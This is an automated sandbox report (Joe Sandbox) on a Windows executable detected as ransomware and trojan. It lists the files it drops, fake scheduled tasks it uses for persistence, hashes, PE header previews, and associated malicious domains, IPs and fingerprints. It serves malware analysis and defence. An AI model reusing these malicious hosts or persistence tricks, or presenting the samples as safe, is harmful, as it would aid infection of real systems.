Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@17/6@3/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 83% (good quality ratio 75.2%) Quality average: 69.9% Quality standard deviation: 32.9%
HCA Information:	Successful, ratio: 98% Number of executed functions: 36 Number of non-executed functions: 69
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): login.live.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:28:00	API Interceptor	526x Sleep call for process: explorer.exe modified
09:28:11	Task Scheduler	Run new task: Firefox Default Browser Agent FC7EB6D179CBBFEC path: C:\Users\user\AppData\Roaming\beirutt
09:29:16	Task Scheduler	Run new task: svcupdater path: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
188.114.96.3	tPR99t7HF1.exe	Get hash	malicious	Browse	potunulit.org/
	file.exe	Get hash	malicious	Browse	potunulit.org/
	file.exe	Get hash	malicious	Browse	potunulit.org/
	file.exe	Get hash	malicious	Browse	potunulit.org/
	file.exe	Get hash	malicious	Browse	potunulit.org/
	file.exe	Get hash	malicious	Browse	potunulit.org/
	akrs27pxbj.exe	Get hash	malicious	Browse	potunulit.org/
	Inquiry759205.doc	Get hash	malicious	Browse	ubochioma.com/okc.exe
	NewOrder#24012023.bat.exe	Get hash	malicious	Browse	www.warmingtheworld.cloud/dr5z/?8Ws45QhQ=wilYOzhsZIX1hZid4nTHDVyJaBR8TewEePxSprGPYi94ZGUtUww5oSxoeyCyvpFcXsYZedtJe5I/aZlQbfl70HiZ62GWHNcGzw==&-LSg=VMYG4jbrOyG
	file.exe	Get hash	malicious	Browse	potunulit.org/
	http://petandgarden.com.au	Get hash	malicious	Browse	www.petandgarden.com.au/
	file.exe	Get hash	malicious	Browse	potunulit.org/
	file.exe	Get hash	malicious	Browse	potunulit.org/
	file.exe	Get hash	malicious	Browse	potunulit.org/
	file.exe	Get hash	malicious	Browse	potunulit.org/
	file.exe	Get hash	malicious	Browse	potunulit.org/
	sample7.exe	Get hash	malicious	Browse	potunulit.org/
	file.exe	Get hash	malicious	Browse	potunulit.org/
	sample49.exe	Get hash	malicious	Browse	potunulit.org/
	file.exe	Get hash	malicious	Browse	potunulit.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
potunulit.org	tPR99t7HF1.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.97.9
	file.exe	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.97.9
	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	akrs27pxbj.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ACPCA	tPR99t7HF1.exe	Get hash	malicious	Browse	162.0.217.254
	YrD1BC1bsf.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	D5BA7A1B36FD9BFDDC5F9AC2299F23632E21933F052B4.exe	Get hash	malicious	Browse	162.0.217.254
	Order 1007165.exe	Get hash	malicious	Browse	162.55.60.2
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	E9387D76F1601429FE70F70A48B966F2EF98C5E07A612.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	MS.Update.Center.Security.KB9241755.msi	Get hash	malicious	Browse	162.55.167.165
CLOUDFLARENETUS	file.exe	Get hash	malicious	Browse	172.67.161.69
	PI_NBI-2250123(MECH)_pdf.exe	Get hash	malicious	Browse	162.159.135.232
	tPR99t7HF1.exe	Get hash	malicious	Browse	188.114.96.3
	http://getyourbabysat.biz/came/index.html#jolette.l@greenmined.co.za	Get hash	malicious	Browse	104.18.11.207
	LibreOffice-release.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.97.9
	file.exe	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.97.3
	HEUR-Trojan.Win32.Crypt.gen-e026bc9a0b7ac31a8.exe	Get hash	malicious	Browse	188.114.97.3
	https://talium.co/doc/aQ1w0a/s/	Get hash	malicious	Browse	104.18.18.132
	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.97.3
	#U25b6#Ufe0f#Ud83d#Udd18#U2500#U2500 #U266b Audio-0056secs.HTM	Get hash	malicious	Browse	104.18.18.132
	https://hicksronaldbown.com/	Get hash	malicious	Browse	104.17.25.14
	EFT_Receipts.htm	Get hash	malicious	Browse	104.17.25.14
	Completed Signed Agreement.htm	Get hash	malicious	Browse	104.17.25.14
	Direct Deposit Processed 1242023.html	Get hash	malicious	Browse	104.17.24.14
	D677F86403915B15AB62B1278CC7E6A8F2A98DE2BA6A8.exe	Get hash	malicious	Browse	104.21.33.100
	Employee Docs.shtml	Get hash	malicious	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	tPR99t7HF1.exe	Get hash	malicious	Browse	162.0.217.254
	YrD1BC1bsf.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	D5BA7A1B36FD9BFDDC5F9AC2299F23632E21933F052B4.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	HEUR-Trojan.Win32.Crypt.gen-e026bc9a0b7ac31a8.exe	Get hash	malicious	Browse	162.0.217.254
	E9387D76F1601429FE70F70A48B966F2EF98C5E07A612.exe	Get hash	malicious	Browse	162.0.217.254
	ZVKooVE7gN.exe	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	https://rise.articulate.com/share/oIPGqlcs4YAbJcrgqMshXod7_KpoUrxZ#/lessons/BiUk3l0uXFxpT9YJvNRZHEHdLBAIWErX	Get hash	malicious	Browse	162.0.217.254
	file.exe	Get hash	malicious	Browse	162.0.217.254
	#U25b6#Ufe0f#Ud83d#Udd18#U2500#U2500 #U266b Audio-0056secs.HTM	Get hash	malicious	Browse	162.0.217.254
	https://hicksronaldbown.com/	Get hash	malicious	Browse	162.0.217.254
	EFT_Receipts.htm	Get hash	malicious	Browse	162.0.217.254
	Completed Signed Agreement.htm	Get hash	malicious	Browse	162.0.217.254
	Remittance Advice.htm	Get hash	malicious	Browse	162.0.217.254
	ACH Remittance.htm	Get hash	malicious	Browse	162.0.217.254
	DepositRemittance.html	Get hash	malicious	Browse	162.0.217.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\43D0.exe	tPR99t7HF1.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	akrs27pxbj.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\43D0.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	718848
Entropy (8bit):	7.8663391957867645
Encrypted:	false
SSDEEP:	12288:XQc1wGGrXn8rDAG7ps+O6TuFlgflEKK9LcFXTASviKWBNbaPSFS:XTwGGrsASprtEKK9wF0SrWBQKFS
MD5:	0A006808F7AA017CAF2DF9CE9E2B55A2
SHA1:	63F5B0E9FE5E3DAEBDBFC8AA168AB163E436AC32
SHA-256:	F55976607594D241004245F084ADD64F399F7D4683C603F56EF92C0CBCD41E05
SHA-512:	8AD4C111BF0904EB739A462E274C7A2FD9EC1AFB2DB7D77F176B26438520C4859B2CCB46A4C76F206E20B4584E434E1D78B26DCD042F08B3D573BB99036E8C73
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Joe Sandbox View:	Filename: tPR99t7HF1.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: akrs27pxbj.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..Y.pl..pl..pl.."...pl.."..rpl.(....pl..pm..pl.."..,pl.."...pl.."...pl.Rich.pl.................PE..L......a.....................Z......6x............@.........................................................................,...d....p..P,..........................P................................Z..@............................................text.............................. ..`.data............4..................@....rsrc...P,...p......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4434343.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\C4AA.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	343040
Entropy (8bit):	7.533406928573143
Encrypted:	false
SSDEEP:	6144:324+ZV6NuvwV+hq3kd2UaXYnKUFWBMljuhLaWdTPk8SarppXad:YuNuvwUhq3kd2USYKUQ6ljkLaWdTPk8q
MD5:	F56B1B3FE0C50C6ED0FAD54627DF7A9A
SHA1:	05742C9AD28475C7AFDD3D6A63DD9200FC0B9F72
SHA-256:	E8F71DA41BBC272EF84589A7575B13B8B5D6D5D01796B3AF033682657263C53B
SHA-512:	FDE2089BCDF19CDB9D27763E4D3294A0E42CD0A3132463636610D85C3903B885BE6142D3B42204E89B76B5595E8B132580C8A5C60CED96D042AD96BCFE29B1C9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...r..c...........!.........\|............................................................@.............................s.......<............................`......................................................d...$............................text.............................. ..`.rdata...[.......\..................@..@.data...x....0......................@....00cfg.......P.......&..............@..@.reloc.......`.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C4AA.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1642648
Entropy (8bit):	7.847643854402106
Encrypted:	false
SSDEEP:	49152:murDawItlpDZLPU/kHWGPaYE3Ku7ZKZ6nxvax85fCSuw:muPawItlpDZDU/kZPaYm/JvaxQCK
MD5:	EA25CE2F3580AF1DD771BAC5B0D2BF83
SHA1:	8A425695AE3154F222BA4A7A8AF03287D20F8BC4
SHA-256:	768E12A9AF62F5F83F6D6FF64C6C10E37834FC202E0E4D609C80CE7FACC8C534
SHA-512:	70776BD050666D7ABCDB0668832A652FC4A67E45243DFD229520DA3712B85B506FFE9C3ED3C3C1E89F388C2D56B6E3FC8CDC31B35485FF1BA456F8A47277F0C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 43%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........G.b...b...b...0>..b...0/..b...09..b.......b...b...b...00..b...0...b...b-..b...0+..b..Rich.b..........................PE..L....~.c......................#.....k.............@...........................9.....2[....@.....................................P.....6.0.....................9.........................................@...............`............................text...6........................... ..`.rdata...0.......2..................@..@.data...<. .........................@....rsrc...0.....6.....................@..@.reloc...I....9..J..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C676.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	417792
Entropy (8bit):	7.008431460440525
Encrypted:	false
SSDEEP:	6144:GILot0e73kNAn1SNCe64axZb30GvtQK/fu1d04DI12mTb:GIct0eLkPNL64Y91tQKXu1PDI12
MD5:	261B1DB94CCF4266128E2EB71A80FDA4
SHA1:	9D4CD03297F31EABE957F261DC7C3C6C268BD39F
SHA-256:	B0072463E78182E8D9721F91F889A62D9CE59A348FDDC5196B6201A5FA68B259
SHA-512:	2DD25970561CF9E3D946ACD891B601E6AA7E6563DDE6C10ED5AC1A6486BBC1851CF3908B5BDEE6C9B29633E51C90339209C50D97C0EA28B897BD6E7117B1AC7B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M_.`.>.3.>.3.>.3.lQ3->.3.l@3.>.3.lV3o>.3...3.>.3.>.3~>.3.l_3.>.3.lA3.>.3.lD3.>.3Rich.>.3................PE..L......b.............................F............@.........................................................................T...d.... ..(............................................................-..@............................................text...8........................... ..`.data...............................@....huxuho.p...........................@..@.gini...............................@..@.vab................................@....rsrc...(.... ......................@..@.reloc...............F..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\beirutt

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	344064
Entropy (8bit):	6.5486278322749145
Encrypted:	false
SSDEEP:	6144:OnCLd9hqCWtvCuWxtt7Tfq3w2YJ5jq7VWRFBMolz90:OC/hqCJuWxttHn+7VWR5lz
MD5:	6DEF34B7D9603C4FC7953F177F73C21A
SHA1:	82D464AEDAE69E9FA5AD521CEED3840595F3AD2F
SHA-256:	277E1518B909735B16F393B7077E453735EB4D2DD651891F9F73DA605941493B
SHA-512:	751477B7F904ED0435E18A4435B54B049FFA65135B280549B0CB3CB378CEE462DC470C690927ED629F6F4B798E9EC5193AE1360ACBA34153AF5749015C546A9D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.`.>.3.>.3.>.3.lQ3.>.3.l@3.>.3.lV3.>.3...3.>.3.>.3.>.3.l_3.>.3.lA3.>.3.lD3.>.3Rich.>.3........................PE..L.....b.....................n.......D............@.............................................................................d....................................................................-..@............................................text............................... ..`.data... ........p..................@....juv....p............f..............@..@.rur.................j..............@..@.cenepem.............n..............@....rsrc................r..............@..@.reloc...............&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\beirutt:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.5486278322749145
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	344064
MD5:	6def34b7d9603c4fc7953f177f73c21a
SHA1:	82d464aedae69e9fa5ad521ceed3840595f3ad2f
SHA256:	277e1518b909735b16f393b7077e453735eb4d2dd651891f9f73da605941493b
SHA512:	751477b7f904ed0435e18a4435b54b049ffa65135b280549b0cb3cb378cee462dc470c690927ed629f6f4b798e9ec5193ae1360acba34153af5749015c546a9d
SSDEEP:	6144:OnCLd9hqCWtvCuWxtt7Tfq3w2YJ5jq7VWRFBMolz90:OC/hqCJuWxttHn+7VWR5lz
TLSH:	B1749E01E2E87ED0F599CA318D2EA7EC363EFD514E156666322C7A3F29701E1C52A31D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.`.>.3.>.3.>.3.lQ3.>.3.l@3.>.3.lV3.>.3...3.>.3.>.3.>.3.l_3.>.3.lA3.>.3.lD3.>.3Rich.>.3........................PE..L......b...

File Icon


Icon Hash:	8494a69696b484e2

Static PE Info

General

Entrypoint:	0x40449f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x62BBE3DF [Wed Jun 29 05:32:15 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	861af707b319724b1132a7a971c54bc2

Entrypoint Preview

Instruction
call 00007F8B6CD1FFFEh
jmp 00007F8B6CD1C30Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [00411008h+ecx*8]
je 00007F8B6CD1C4A5h
inc ecx
cmp ecx, 2Dh
jc 00007F8B6CD1C483h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F8B6CD1C4A0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0041100Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F8B6CD1D69Dh
test eax, eax
jne 00007F8B6CD1C498h
mov eax, 00411170h
ret
add eax, 08h
ret
mov edi, edi
push ebp
mov ebp, esp
xor eax, eax
cmp dword ptr [ebp+08h], eax
push 00000000h
sete al
push 00001000h
push eax
call dword ptr [004010CCh]
mov dword ptr [00427F60h], eax
test eax, eax
jne 00007F8B6CD1C494h
pop ebp
ret
xor eax, eax
inc eax
mov dword ptr [0042A204h], eax
pop ebp
ret
mov edi, edi
push esi
push edi
xor esi, esi
mov edi, 00427F68h
cmp dword ptr [00411184h+esi*8], 01h
jne 00007F8B6CD1C4B0h
lea eax, dword ptr [00411180h+esi*8]
mov dword ptr [eax], edi
push 00000FA0h
push dword ptr [eax]
add edi, 18h
call 00007F8B6CD1F88Ch
pop ecx
pop ecx
test eax, eax
je 00007F8B6CD1C49Eh
inc esi
cmp esi, 24h
jl 00007F8B6CD1C464h

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf7b4	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2e000	0x2b298	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5a000	0xaa0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11d0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2da8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x190	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xf0f0	0xf200	False	0.5824832128099173	data	6.681630211805764	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x11000	0x19220	0x17000	False	0.9074388586956522	data	7.675700241362958	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.juv	0x2b000	0x270	0x400	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rur	0x2c000	0x2d3	0x400	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.cenepem	0x2d000	0x3c3	0x400	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2e000	0x2b298	0x2b400	False	0.5356642882947977	data	5.343845697441332	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5a000	0x181a	0x1a00	False	0.3527644230769231	data	3.5621171270928884	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
AFX_DIALOG_LAYOUT	0x563f0	0x2	data
AFX_DIALOG_LAYOUT	0x563d8	0x2	data
AFX_DIALOG_LAYOUT	0x563e0	0xc	data
RT_CURSOR	0x563f8	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0
RT_CURSOR	0x56728	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0
RT_CURSOR	0x56880	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_CURSOR	0x57728	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_CURSOR	0x57ff8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0
RT_CURSOR	0x58128	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0
RT_ICON	0x2ee20	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x2fcc8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x30570	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x32b18	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x33bc0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x34078	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0
RT_ICON	0x34740	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x36ce8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x37180	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x38028	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x388d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x38e38	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x3b3e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x3c488	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x3ce10	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x3d2e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x3e188	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x3ea30	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0
RT_ICON	0x3f0f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x3f660	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x41c08	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x42cb0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x43180	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors
RT_ICON	0x44028	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
RT_ICON	0x448d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors
RT_ICON	0x44f98	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors
RT_ICON	0x45500	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216
RT_ICON	0x47aa8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096
RT_ICON	0x48b50	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304
RT_ICON	0x494d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024
RT_ICON	0x499b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x4a860	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x4b108	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x4b670	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x4dc18	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x4ecc0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x4f648	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x4fb18	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x509c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x51268	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0
RT_ICON	0x51930	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x51e98	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x54440	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x554e8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
